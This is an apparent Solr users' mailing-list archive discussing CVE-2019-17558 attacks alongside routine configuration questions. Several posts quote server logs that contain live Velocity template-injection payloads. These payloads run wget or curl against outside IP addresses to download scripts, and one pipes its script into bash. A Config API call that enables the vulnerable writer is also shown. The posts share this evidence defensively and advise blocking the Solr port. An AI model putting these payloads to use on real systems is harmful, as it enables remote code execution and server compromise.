Re: CVE-2019-17558 on SOLR 6.1

2021-02-13 Thread TK Solr

(Resending to the list. Sorry, Rick.)

FYI, my client was using 8.3.1, which should have mitigated the attack.
But the server was suffering a sudden death of the Solr process, and the log 
showed it was being attacked using CVE-2019-17558.


We blocked external access to the Solr API, and the sudden deaths stopped. So I 
tend to think that just disabling the Velocity engine might not be enough.


Of course there is a possibility that this server was also getting a different 
kind of attack. We don't know.

But in general, the Solr port should be closed from external access.
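
A minimal sketch of what that can look like, assuming iptables, the default
port 8983, and a placeholder trusted subnet:

    # allow a trusted internal subnet, drop everything else on the Solr port
    iptables -A INPUT -p tcp --dport 8983 -s 10.0.0.0/24 -j ACCEPT
    iptables -A INPUT -p tcp --dport 8983 -j DROP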

TK

On 2/12/21 10:17 AM, Rick Tham wrote:

We are using Solr 6.1 and at the moment we cannot upgrade due to
application dependencies.

We have mitigation steps in place to only trust specific machines within
our DMZ.

I am trying to figure out if the following is an additional valid
mitigation step for CVE-2019-17558 on Solr 6.1. None of our solrconfig.xml
files contain the lib references to the velocity jar files, as follows:


<lib dir="${solr.install.dir:../../../..}/contrib/velocity/lib" regex=".*\.jar"/>
<lib dir="${solr.install.dir:../../../..}/dist/" regex="solr-velocity-\d.*\.jar"/>

It doesn't appear that you can add these jar references using the Config
API. Without these references, you are not able to flip
params.resource.loader.enabled to true using the Config API. If you are not
able to flip the flag, and none of your cores have these lib references, then
is the risk present?
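
For reference, the kind of Config API call in question (and the one the attack
logs elsewhere in this archive show being used to register the writer) looks
roughly like this; the core name is a placeholder:

    curl -X POST -H 'Content-type: application/json' \
      http://localhost:8983/solr/mycore/config -d '{
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }'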

Thanks in advance!



Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Oops, I should have referenced this document rather:

https://www.tenable.com/cve/CVE-2019-17558


On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability 



If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:


webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) 
[c:sitecore_submittals_index s:shard1 r:core_node1 
x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to 
create a new queryResponseWriter with {type = queryResponseWriter,name = 
velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args 
= 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. Since then, my client's 
Solr node has been running for 4 weeks so far. I think this security hole 
doesn't just leak information; it can also kill the Solr process.
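
If an attacker has already managed to register the writer, one additional
hardening step (hedged; verify against your version's Config API
documentation) is to delete it again through the Config API; the core name
below is a placeholder:

    curl -X POST -H 'Content-type: application/json' \
      http://localhost:8983/solr/mycore/config \
      -d '{"delete-queryresponsewriter": "velocity"}'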


TK





Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:



webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. Since then, my client's Solr 
node has been running for 4 weeks so far. I think this security hole doesn't 
just leak information; it can also kill the Solr process.


TK




Run multiple (different) Solr versions on a server

2021-01-25 Thread solr



Hi all,

is it possible to run multiple (different) Solr versions on a (Debian) server?
For development and production purposes I'd like to run
- a development version (Solr 8.7.0) and
- a production version (Solr 7.4.0).
Which settings are available/necessary?
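
One possible layout (an untested sketch; all paths and ports below are
placeholders) is one extracted tarball per version, each with its own home
directory and port:

    tar xzf solr-7.4.0.tgz -C /opt
    tar xzf solr-8.7.0.tgz -C /opt

    # production instance on the default port
    /opt/solr-7.4.0/bin/solr start -p 8983 -s /var/solr-7.4.0/data

    # development instance on its own port
    /opt/solr-8.7.0/bin/solr start -p 8984 -s /var/solr-8.7.0/data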

Thanks
Walter Claassen



Re: "Failed to reserve shared memory."

2021-01-07 Thread TK Solr

I added these lines to solr.in.sh and restarted Solr:

 GC_TUNE=('-XX:+UseG1GC' \
   '-XX:+PerfDisableSharedMem' \
   '-XX:+ParallelRefProcEnabled' \
   '-XX:MaxGCPauseMillis=250' \
   '-XX:+AlwaysPreTouch' \
   '-XX:+ExplicitGCInvokesConcurrent')

According to the Admin UI, -XX:+UseLargePages is gone, which is good, but all 
the other -XX:* flags except -XX:+UseG1GC are gone as well.


What is the correct way to remove just -XX:+UseLargePages?
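
(One plausible explanation, offered as an assumption worth testing: bin/solr
later re-splits $GC_TUNE as a plain string via the GC_TUNE=($GC_TUNE) line
quoted below, and in bash an unsubscripted $GC_TUNE expands to only the first
element of an array, which would leave just -XX:+UseG1GC. Defining GC_TUNE as
one string in solr.in.sh should keep all the flags:)

    # In solr.in.sh, one string rather than a bash array. GC_TUNE replaces
    # Solr's whole default flag list, so restate everything you want to keep
    # (the flags above, minus -XX:+UseLargePages):
    GC_TUNE="-XX:+UseG1GC \
      -XX:+PerfDisableSharedMem \
      -XX:+ParallelRefProcEnabled \
      -XX:MaxGCPauseMillis=250 \
      -XX:+AlwaysPreTouch \
      -XX:+ExplicitGCInvokesConcurrent"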

TK

On 1/6/21 3:42 PM, TK Solr wrote:
My client is experiencing a sudden-death syndrome with Solr 8.3.1. Solr stops 
responding suddenly and they have to restart Solr.
(It is not clear whether the Solr/Jetty process was dead, or alive but not 
responding. No OOM log was found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er 



which suggests removing the JVM option -XX:+UseLargePages, which is added by 
the bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm 
not quite sure what kind of variable GC_TUNE is. It is used like this:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with the ${GC_TUNE+x} and ($GC_TUNE) syntax. Is this a 
special kind of environment variable?
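
(For reference: this is plain bash parameter expansion, not a Solr-specific
variable. A small illustration:)

    # ${GC_TUNE+x} expands to "x" when GC_TUNE is set (even if empty) and to
    # nothing when it is unset, so [ -z ${GC_TUNE+x} ] means "GC_TUNE is unset".
    unset GC_TUNE
    [ -z "${GC_TUNE+x}" ] && echo "unset: Solr will use its default flag list"

    # GC_TUNE=($GC_TUNE) word-splits a plain string into a bash array,
    # one element per JVM flag.
    GC_TUNE="-XX:+UseG1GC -XX:+PerfDisableSharedMem"
    GC_TUNE=($GC_TUNE)
    echo "${#GC_TUNE[@]} flags; second is ${GC_TUNE[1]}"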



TK






Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr
Please disregard my previous post. I understand now that these are actual error 
messages, not errors from the Admin UI itself.


I think this server is being attacked using the vulnerability described here

https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

Fortunately the attack isn't succeeding, thanks to the SOLR-13971 fix; instead 
it is causing these errors. I'll fortify access to Solr.


On 1/7/21 11:02 AM, TK Solr wrote:
On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:


Time (Local)          Level   Core       Logger        Message
1/7/2021 8:41:46 AM   ERROR   x:mycore   loader        ResourceManager: unable to find resource 'custom.vm' in any resource loader.
                      false
1/7/2021 8:41:46 AM   ERROR   x:mycore   HttpSolrCall  null:java.io.IOException: Unable to find resource 'custom.vm'
                      false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

...

Are these errors from the Admin UI code itself? Does the Admin UI use 
Velocity? (I thought it might be a library path issue but I don't see 
'custom.vm' anywhere in the Solr source code.)



What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

I'm using Solr 8.3.1 with OpenJDK 11 on Ubuntu 18.04.3.

TK





The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr

On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:

Time (Local)          Level   Core       Logger        Message
1/7/2021 8:41:46 AM   ERROR   x:mycore   loader        ResourceManager: unable to find resource 'custom.vm' in any resource loader.
                      false
1/7/2021 8:41:46 AM   ERROR   x:mycore   HttpSolrCall  null:java.io.IOException: Unable to find resource 'custom.vm'
                      false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
...

Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? 
(I thought it might be a library path issue but I don't see 'custom.vm' 
anywhere in the Solr source code.)


What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

I'm using Solr 8.3.1 with OpenJDK 11 on Ubuntu 18.04.3.

TK




"Failed to reserve shared memory."

2021-01-06 Thread TK Solr
My client is experiencing a sudden-death syndrome with Solr 8.3.1. Solr stops 
responding suddenly and they have to restart Solr.
(It is not clear whether the Solr/Jetty process was dead, or alive but not 
responding. No OOM log was found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er

which suggests removing the JVM option -XX:+UseLargePages, which is added by the 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used like this:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with the ${GC_TUNE+x} and ($GC_TUNE) syntax. Is this a 
special kind of environment variable?



TK





Java Streaming API - nested Hashjoins with zk and accesstoken

2020-11-01 Thread Anamika Solr
Hi All,

I need to combine 3 different documents using hashJoin. I am using the query
below (ignore the placeholder queries):

hashJoin(hashJoin(search(collectionName,q="*:*",fl="id",qt="/export",sort="id
desc"), hashed =
select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id
asc")),on="id"), hashed =
select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id
asc")),on="id")

This works with a simple TupleStream in Java. But I also need to pass an auth
token to ZooKeeper, so I have to use the code below:
ZkClientClusterStateProvider zkCluster =
    new ZkClientClusterStateProvider(zkHosts, null);
SolrZkClient zkServer = zkCluster.getZkStateReader().getZkClient();
StreamFactory streamFactory = new StreamFactory()
    .withCollectionZkHost("collectionName", zkServer.getZkServerAddress())
    .withFunctionName("search", CloudSolrStream.class)
    .withFunctionName("hashJoin", HashJoinStream.class)
    .withFunctionName("select", SelectStream.class);

try (HashJoinStream hashJoinStream =
        (HashJoinStream) streamFactory.constructStream(expr)) {
  // ...
}

The issue is that a single hashJoin with nested select and search works fine
with this API, but the nested (multiple) hashJoin never completes. I can see
the expression is parsed correctly, but it waits indefinitely for the thread
to complete.
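
One way to narrow this down (a hedged suggestion; the collection name is as
above) is to send the same expression to the /stream handler with curl, which
bypasses the SolrJ plumbing; if it completes there, the hang is likely in how
the Java side constructs or reads the stream:

    curl --data-urlencode 'expr=hashJoin(hashJoin(search(collectionName,q="*:*",fl="id",qt="/export",sort="id desc"),hashed=select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id asc")),on="id"),hashed=select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id asc")),on="id")' \
      http://localhost:8983/solr/collectionName/stream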

Any help is appreciated.

Thanks,
Anamika


Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

It doesn't tell much:

"debug":{ "rawquerystring":"email:*@aol.com", "querystring":"email:*@aol.com", 
"parsedquery":"(email:*@aol.com)", "parsedquery_toString":"email:*@aol.com", 
"explain":{ "11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{ "match":true, "value":1.0, 
"description":"email:*@aol.com"},


The email field uses ReversedWildcardFilter for both indexing and query.

On 4/15/20 12:04 PM, Erick Erickson wrote:

What do you see if you add debug=query? That should tell you….

Best,
Erick


On Apr 15, 2020, at 2:40 PM, TK Solr  wrote:

Thank you.

Is there any harm if I use it on the query side too? In my case it seems to
work OK (even with withOriginal="false"), and it's even faster.
I see the query parser code looks at the index analyzer and applies
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses
ReversedWildcardFilter.

On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need to apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
index the original token as well as the reversed token.
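
A hedged way to see this in action is the field analysis API (the core and
field type names below are placeholders); the index-side output should show
the \u0001-prefixed reversed token next to the original when withOriginal is
true:

    curl "http://localhost:8983/solr/mycore/analysis/field?analysis.fieldtype=text_general_rev&analysis.fieldvalue=mar"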


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with using ReversedWildcardFilter at index time only versus
at both index and query time.

My results show that using ReversedWildcardFilter both times runs twice as
fast, but my dataset is not very large (on the order of 10k docs), so I'm
not sure I can draw a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>
in the Solr Ref Guide, and in the only usage found in managed-schema (the
text_general_rev field type), the filter is used only for indexing:

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer type="index">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
            maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
  </analyzer>
  <analyzer type="query">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
  </analyzer>
</fieldType>

Is it incorrect to use the same analyzer for query like?

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
            maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
  </analyzer>
</fieldType>

In the description of the filter, I see "Tokens without wildcards are not
reversed." But the wildcard appears only in the query string. How can
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK






Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

Thank you.

Is there any harm if I use it on the query side too? In my case it seems to
work OK (even with withOriginal="false"), and it's even faster.
I see the query parser code looks at the index analyzer and applies
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses
ReversedWildcardFilter.


On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need to apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
index the original token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with using ReversedWildcardFilter at index time only versus
at both index and query time.

My results show that using ReversedWildcardFilter both times runs twice as
fast, but my dataset is not very large (on the order of 10k docs), so I'm
not sure I can draw a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>
in the Solr Ref Guide, and in the only usage found in managed-schema (the
text_general_rev field type), the filter is used only for indexing:

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer type="index">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
            maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
  </analyzer>
  <analyzer type="query">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
  </analyzer>
</fieldType>

Is it incorrect to use the same analyzer for query like?

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
            maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
  </analyzer>
</fieldType>

In the description of the filter, I see "Tokens without wildcards are not
reversed." But the wildcard appears only in the query string. How can
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK




Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
I experimented with using ReversedWildcardFilter at index time only versus
at both index and query time.

My results show that using ReversedWildcardFilter both times runs twice as
fast, but my dataset is not very large (on the order of 10k docs), so I'm
not sure I can draw a conclusion.


On 4/8/20 2:49 PM, TK Solr wrote:
In the usage example shown for ReversedWildcardFilter 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> 
in the Solr Ref Guide, and in the only usage found in managed-schema (the
text_general_rev field type), the filter is used only for indexing:

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer type="index">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
            maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
  </analyzer>
  <analyzer type="query">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
  </analyzer>
</fieldType>

Is it incorrect to use the same analyzer for query like?

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
            maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
  </analyzer>
</fieldType>

In the description of the filter, I see "Tokens without wildcards are not
reversed." But the wildcard appears only in the query string. How can
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK




ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
In the usage example shown for ReversedWildcardFilter 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> 
in the Solr Ref Guide, and in the only usage found in managed-schema (the
text_general_rev field type), the filter is used only for indexing:

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer type="index">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
            maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
  </analyzer>
  <analyzer type="query">
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
    <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
    <filter class="solr.LowerCaseFilterFactory"/>
  </analyzer>
</fieldType>

Is it incorrect to use the same analyzer for query like?

<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
            maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
  </analyzer>
</fieldType>

In the description of the filter, I see "Tokens without wildcards are not
reversed." But the wildcard appears only in the query string. How can
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK




Re: Spellcheck on specified fields?

2020-04-07 Thread TK Solr
Correction: the "mark seattle" query doesn't show suggestions, since "mark" 
alone has some hits.
It is when the same logic is used for a single-term query of "seatle" that the 
3 suggestions of "seattle" are returned. Do I have to identify the field by 
using the startOffset value?

On 4/7/20 3:46 PM, TK Solr wrote:

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)&spellcheck=true

The raw query terms are distributed to all fields because I don't know which 
term is intended for which field.

If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard the exact numbers. It's from a more complicated query of the 
same nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field holds a phone number, for which spelling corrections are 
not very useful, I would like the spellchecker to skip this and similar fields, 
but I don't see a relevant parameter in the spellchecker's documentation. Is 
there any way to specify the fields I am interested in (or not interested in)?

TK





Spellcheck on specified fields?

2020-04-07 Thread TK Solr

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)&spellcheck=true

The raw query terms are distributed to all fields because I don't know which 
term is intended for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard the exact numbers. It's from a more complicated query of the 
same nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field holds a phone number, for which spelling corrections are 
not very useful, I would like the spellchecker to skip this and similar fields, 
but I don't see a relevant parameter in the spellchecker's documentation. Is 
there any way to specify the fields I am interested in (or not interested in)?
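
(One possible workaround, for the record: spellcheck.q is a standard parameter
that lets you hand the spellchecker different text than q, so the phone terms
never reach it; the core name below is a placeholder.)

    curl "http://localhost:8983/solr/mycore/select" \
      --data-urlencode 'q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)' \
      --data-urlencode 'spellcheck=true' \
      --data-urlencode 'spellcheck.q=mark seattle'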

TK





Proper way to manage managed-schema file

2020-04-06 Thread TK Solr
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and 
modifying managed-schema.


I noticed that Solr overwrites this file, wiping out all my comments and 
rearranging the order. I noticed there is a "DO NOT EDIT" comment. Then what is 
the proper/expected way to manage this file? The Admin UI can add fields but 
cannot edit existing ones or add new field types. Do I keep a script of many 
Schema API calls? (Then how do I reset the schema to the initial default, which 
would be needed before re-replaying the schema calls?)
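
(For the record, the Schema API is the supported way to modify a managed
schema, and keeping the calls in a script makes them replayable; the field
type below is a made-up example and the core name is a placeholder.)

    curl -X POST -H 'Content-type: application/json' \
      http://localhost:8983/solr/mycore/schema -d '{
      "add-field-type": {
        "name": "text_lowercase",
        "class": "solr.TextField",
        "analyzer": {
          "tokenizer": { "class": "solr.KeywordTokenizerFactory" },
          "filters": [ { "class": "solr.LowerCaseFilterFactory" } ]
        }
      }
    }'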


TK




Re: Admin UI core loading fails

2020-04-06 Thread TK Solr
I failed to include this line in my first post. This /select call with strange 
parameters (q=1) seems to happen periodically, even when I don't perform any 
operation in the Admin UI. I scanned the Solr source code, /opt/solr, and 
/var/solr/data, and I couldn't find the source of this call.


2020-04-04 00:41:02.604 INFO (qtp231311211-24) [   x:my_core] o.a.s.c.S.Request 
[my_core] webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
hits=0 status=0 QTime=1
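
A quick way to check how often this attack pattern shows up (the log path is
the default for a service install; adjust to your layout):

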